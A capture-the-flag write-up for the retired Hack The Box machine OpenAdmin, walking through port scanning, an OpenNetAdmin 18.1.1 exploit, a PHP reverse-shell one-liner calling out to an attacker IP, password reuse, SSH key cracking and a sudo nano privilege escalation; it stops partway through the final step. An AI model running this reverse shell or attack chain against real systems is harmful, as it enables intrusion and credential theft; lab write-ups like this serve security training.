Today, we’re going to solve another CTF machine OpenAdmin. It is now a retired box and can be accessible to VIP members.
Specifications
- Target OS : Linux
- Services : SSH, HTTP
- IP Address : 10.10.10.171
- Difficulty : Easy
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step consists of the reconnaissance phase as port scanning.
Ports Scanning
During this step, we’re gonna identify the target to see what we have behind the IP Address.
nmap -sC -sV -oA 10.10.10.171
Enumerating Port 80
By running gobuster we found /music and /artwork directory with 301 status code.
gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.171/ -s '200,204,301,302,307,403,500' -e | tee '/root/htb/10.10.10.171/scans/10.10.10.171_80_gobuster_common.txt'
Enumerating Music Directory
If we browse URL http://10.10.10.171/music
If we click on login there’s OpenNetAdmin installed.
Let’s enumerate OpenNetAdmin and Google what really it is?
Searchsploit
There’s an OpenNetAdmin installed
Since our target version of OpenNetAdmin is 18.1.1 we got two exploits for it.
Let’s searchsploit -m exploits/php/webapps/47691.sh.
I tried to run exploit it didn’t work for some reason.
I had to dos2unix 4691.sh
And we got low privilege shell.
By going through ona config file we found a database creds.
Database
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
Foothold
Let’s try getting a proper shell first.
I tired every reverse shell such as Perl, Python, and bash none of them worked for me.
I did wget p0wny-shell and uploaded it and got a reverse shell through that way.
php -r '$sock=fsockopen("10.10.14.242",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
And got a reverse shell instant.
Seems like we don’t have permission to both of the directories.
If you remember we had SQL Database let’s dump it.
We don’t have access to SQL or neither SQLDump is installed.
There’s a reused password for jimmy.
lets SSH to jimmy with SQL creds which we found.
ssh jimmy@10.10.10.171
n1nj4W4rri0R!
After doing some enumeration and looking for something interesting.
We got!
If you take a look at main.php we’ll see it’s our way to get joanna ssh private key. But we don’t know where it’s hosted let’s take a look at apache config.
If you take a look at internal.conf and we’ll see it’s running on port 52846. Let’s make sure if that port is opened for us.
Seems like it’s only opened for the local network but luckily we’re already on the network.
curl localhost:52846/main.php
And we got joanna private ssh key.
Let’s crack it using GitHub - quarantin/rsakey-cracker: Tool to brute-force the passphrase of a RSA private key in PEM format.
And we got the password!
bloodninjas
let’s do SSH login as joanna.
ssh -i key joanna@10.10.10.171 - bloodninjas
Now, that we’re login as joanna let’s do some enumeration.
Privilege Escalation
If we do sudo -l
joanna can sudo run nano to read /opt/priv without password
input to sudo /bin/nano /opt/priv enter nano editor
